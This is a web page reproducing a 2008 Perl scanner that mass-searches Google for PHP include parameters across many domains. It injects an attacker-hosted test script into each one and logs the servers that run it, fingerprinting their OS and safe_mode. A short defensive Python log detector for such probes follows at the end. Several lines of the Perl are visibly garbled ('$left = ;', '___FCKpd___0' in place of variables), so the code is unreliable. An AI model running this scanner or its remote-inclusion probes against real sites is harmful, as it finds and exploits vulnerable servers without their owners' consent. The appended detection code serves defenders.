Google-php-include-bugs searcher v 0.8
Source: www.security-teams.net  Author: drmist  Published: 2008-10-23
perl 
 
# ================================================================ # 
#          Google-php-include-bugs searcher v 0.8                  # 
#                          (c)oded by drmist\STNC                  # 
#                          www.security-teams.net                  # 
#                                                                  # 
#                 ATTENTION. THIS SCRIPT IS PRIVATE.               # 
#              ONLY FOR STNC AND FRIENDS. NOT FOR SALE.            # 
#                                                                  # 
#  Usage: perl script.pl --log=<log-file> --url=<test-script-url>  # 
#  Test script:                                                    # 
#  <?php                                                           # 
#  error_reporting(0);                                             # 
#  $s = md5("STNC");                                               # 
#  $code = eregi("windows", php_uname())+                          # 
#  2*eregi("apache", getenv("SERVER_SOFTWARE"))+                   # 
#  4*ini_get('safe_mode'); echo $s."[$code]".$s;                   # 
#  ?>                                                              # 
# ================================================================ # 
 
use IO::Socket; 
 
@inc_bugs = ("page", "text", "print", "html", "url", "view", "show", "body", "cat",
             "inc", "incl", "include", "read", "write", "data", "code", "fname",
             "filename", "cont", "content", "menu", "open", "file", "id", "p", "f",
             "seite", "pagina", "vista", "vue", "visao", "datei", "offnen", "corpo",
             "corps", "ouvrir", "fichier", "abrir", "fichero", "inhalt", "contenu",
             "conteudo");

@zones = ("au", "com", "net", "org", "de", "fr", "uk", "br", "am",
          "info", "name", "aero", "biz", "edu", "ws", "in",
          "cn", "us", "be", "it", "cc", "tv", "ru", "su",
          "jp", "kz", "se", "is", "ca", "gs", "ms", "vg",
          "be", "fi", "gov");
 
@ftypes = ("php", "php3"); 
 
$boundary = "ca73bad132fa0c99fe9ce9efe9029e21"; # md5("STNC"); 
 
for($i = 0; $i < @ARGV; $i++) 
{ 
 if($ARGV[$i] =~ /^--log=(.*)$/) { $log = $1; } 
 elsif($ARGV[$i] =~ /^--url=(.*)$/) {$script = $1; } 
} 
 
if(!($script && $log)){ usage(); exit; } 
 
foreach $inc(@inc_bugs) 
{ 
 foreach $zone(@zones) 
 { 
   foreach $ftype(@ftypes) 
   { 
     $request = "filetype:$ftype site:$zone inurl:$inc="; 
     print "\n[$request]\n"; 
 
     $request =~ s/(.)/sprintf("%%%02x",ord($1))/eg; 
     @dn = (); 
 
     for($i = 0;$i < 10; $i++) 
     { 
       @temp = get("http://www.google.com/search?filter=0&num=100&start=".$i. 
        "00&q=$request")  =~ /(http\:\/\/[a-z0-9\.\-\/\?\:\&\%\=\_]{5,})/gi; 
       foreach $url (@temp)
       {
         if($url !~ /($inc=[^\&]+)/i) { next; }
         $left = ;
         $right = ;
         if($url =~ /https?\:\/\/[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\/search\?q=cache:/i){ next; }
         if($url =~ /google\.com/i){ next; }
         ($domain) = $url =~ /^http\:\/\/([a-z0-9\.\-]{5,})/;
         if($domain =~ /^www\.(.+)$/) { $domain = $1; }
         $f=0;foreach(@dn){if(___FCKpd___0 eq $domain){$f++;last;}}if($f){next;}
         push @dn, $domain;
         $print = "$left$inc=[INCLUDE]$right";
         if(($data) = get("$left$inc=$script\?$right") =~ /$boundary\[([0-9]+)\]$boundary/i)
         {
           $s = "$print - ".(($data % 2) ? "WINDOWS" : "UNIX").(($data > 3) ? ", SAFE_MODE" : "")."\n";
           $count++;
           print "[$count] $s";
           open LOG, ">>$log";
           print LOG $s;
           close LOG;
         }
         else { print "$print - no bugs\n"; }
       }
     }
   }
 }
}

sub timeout() { close $sock; }

sub get()
{
 local $request = ___FCKpd___0[0];
 local $port = 80;
 local $data = "";
 if(local($server, $url) = $request =~ /^http\:\/\/([^\/]+)\/(.+)$/)
 {
   if($server =~ /^([^\:]+)\:([0-9]{2,5})$/){ $server = $1; $port = $2; }
   $sock = IO::Socket::INET->new( PeerAddr => $server, PeerPort => $port, Proto => 'tcp', Type => SOCK_STREAM, TimeOut => $timeout ) or return 0; # connection failed
   print $sock "GET /$url HTTP/1.0\r\nHost: $server\r\n\r\n";
   $SIG{ALRM} = \&timeout;
   alarm 10;
   while(<$sock>){ $data .= ___FCKpd___0; }
   alarm 0;
   close $sock;
 }
 return $data;
}

sub usage()
{
 print qq(Usage: perl $0 --log=<log-file> --url=<url-of-test-script-source>
Test script:
<?php
error_reporting(0);
\$s = md5("STNC");
\$code = eregi("windows", php_uname())+
2*eregi("apache", getenv("SERVER_SOFTWARE"))+
4*ini_get('safe_mode'); echo \$s."[\$code]".\$s;
?>
);
}
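
A defender's view of the traffic this scanner produces, as an added example that is not part of the original listing: the script requests `<param>=<remote URL>?` using parameter names from `@inc_bugs`, over HTTP/1.0 with only a `Host` header, so the same traits can be matched in web access logs. The combined log format, the function name `find_rfi_probes` and the sample log lines are assumptions made for the example.

```python
import re
from urllib.parse import parse_qsl

# Parameter names taken from the listing's @inc_bugs array.
INCLUDE_PARAMS = set("""page text print html url view show body cat inc incl
include read write data code fname filename cont content menu open file id p f
seite pagina vista vue visao datei offnen corpo corps ouvrir fichier abrir
fichero inhalt contenu conteudo""".split())

# Apache/nginx "combined" access-log format (assumed log layout).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) '
    r'(?P<proto>HTTP/[\d.]+)" \d{3} \S+ "[^"]*" "(?P<ua>[^"]*)"')
REMOTE_RE = re.compile(r"^(?:https?|ftp)://", re.I)

def find_rfi_probes(lines):
    """Return one finding per query parameter whose decoded value is a remote URL."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        query = m["target"].partition("?")[2]
        # parse_qsl percent-decodes values, so encoded URLs are caught too.
        for name, value in parse_qsl(query, keep_blank_values=True):
            if not REMOTE_RE.match(value):
                continue
            findings.append({
                "ip": m["ip"],
                "param": name,
                "value": value,
                # Name is on the scanner's word list: higher confidence.
                "known_param": name.lower() in INCLUDE_PARAMS,
                # The listing's get() sends HTTP/1.0 and no User-Agent header.
                "bare_client": m["proto"] == "HTTP/1.0" and m["ua"] in ("", "-"),
            })
    return findings

# Constructed sample log lines (documentation-range IPs, example domains).
SAMPLE_LOG = [
    '203.0.113.7 - - [23/Oct/2008:10:01:02 +0000] "GET /index.php?page=http://probe.example/t.txt?&id=3 HTTP/1.0" 200 5120 "-" "-"',
    '198.51.100.4 - - [23/Oct/2008:10:01:05 +0000] "GET /index.php?page=about HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [23/Oct/2008:10:02:11 +0000] "GET /view.php?fname=http%3A%2F%2Fprobe.example%2Ft.txt%3F HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
    '198.51.100.8 - - [23/Oct/2008:10:03:40 +0000] "GET /login.php?return=https://shop.example/cart HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in find_rfi_probes(SAMPLE_LOG):
        print(finding)
```

A hit with `known_param` false, such as the constructed `return=` redirect line, is a lower-confidence match and is more likely ordinary application behaviour.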

 